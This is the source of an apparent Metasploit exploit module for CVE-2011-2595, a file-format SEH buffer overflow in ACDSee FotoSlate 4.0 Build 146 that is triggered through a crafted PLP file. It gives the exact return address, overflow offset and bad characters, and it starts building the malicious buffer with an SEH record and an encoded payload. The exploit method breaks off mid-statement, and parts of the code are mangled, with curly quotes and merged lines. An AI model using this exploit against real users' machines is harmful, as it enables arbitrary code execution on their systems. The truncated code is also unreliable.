ACDSee FotoSlate PLP File id Parameter Overflow

##
# $Id: acdsee_fotoslate_string.rb 13853 2011-10-10 16:47:33Z sinn3r $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require ‘msf/core’

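# Metasploit module for CVE-2011-2595 (ACDSee FotoSlate 4.0 Build 146).
# This class body declares only the module metadata, the target table and the
# FILENAME option; the PLP file itself is produced by #exploit further down.
class Metasploit3 < Msf::Exploit::Remote
  Rank = GoodRanking

  include Msf::Exploit::FILEFORMAT
  include Msf::Exploit::Remote::Seh

  # Registers the module's metadata with the framework and declares the
  # FILENAME option (default 'msf.plp').
  #
  # @param info [Hash] metadata overrides merged in by update_info
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'ACDSee FotoSlate PLP File id Parameter Overflow',
      'Description'    => %q{
          This module exploits a buffer overflow in ACDSee FotoSlate 4.0 Build 146 via
          a specially crafted id parameter in a String element. When viewing a malicious
          PLP file with the ACDSee FotoSlate product, a remote attacker could overflow a
          buffer and execute arbitrary code. This exploit has been tested on systems such as
          Windows XP SP3, Windows Vista, and Windows 7.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Parvez Anwar', # Vulnerability discovery
          'juan vazquez'  # Metasploit module
        ],
      'Version'        => '$Revision: 13853 $',
      'References'     =>
        [
          [ 'CVE', '2011-2595' ],
          [ 'OSVDB', '75425' ],
          [ 'BID', '49558' ],
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'process',
          # NOTE(review): presumably disabled because a FILEFORMAT module only
          # writes a file and does not itself wait for a session -- confirm.
          'DisablePayloadHandler' => 'true'
        },
      'Payload'        =>
        {
          #'Space' => 4000,
          # NUL and double-quote are excluded; the value is described above as
          # an attribute of a String element, so a quote would presumably end
          # it early -- confirm against #exploit.
          'BadChars' => "\x00\x22"
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [
            'ACDSee FotoSlate 4.0 Build 146',
            {
              'Ret'         => 0x263a5b57, # pop, pop, ret from ipwssl6.dll
              'Offset'      => 1812,       # bytes before the SEH record (see #exploit)
              'TotalLength' => 5000        # total size of the generated buffer
            }
          ],
        ],
      'Privileged'     => false,
      'DisclosureDate' => 'Sep 12 2011',
      'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('FILENAME', [ true, 'The file name.', 'msf.plp']),
      ], self.class)
  end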

def exploit

overflow = rand_text(target[“Offset”])
overflow << generate_seh_record(target.ret) overflow << payload.encoded overflow << rand_text_alpha(target["TotalLength"] - overflow.length) plp =<